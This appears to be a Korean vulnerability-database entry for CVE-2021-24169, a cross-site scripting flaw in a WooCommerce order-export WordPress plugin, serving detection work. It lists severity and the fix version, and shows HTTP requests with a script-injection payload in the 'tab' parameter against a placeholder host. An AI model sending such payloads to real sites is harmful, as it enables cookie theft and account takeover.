🔙 목록으로 돌아가기

CVE-2021-24169: WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting

TitleWordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactAuthenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise.
RemediationFixed in version 3.1.8.
CVSS Score6.1
EPSS Score0.05053
CVE IDCVE-2021-24169
CWE IDCWE-79
Tags cve2021 cve wordpress authenticated wpscan xss wp-plugin wp woo-order-export-lite edb algolplus vuln

🔍 Vulnerability Description

WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.3
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=5WcZrf&pwd=IZAOMO&wp-submit=Log+In
GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.12
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24169.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24169.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A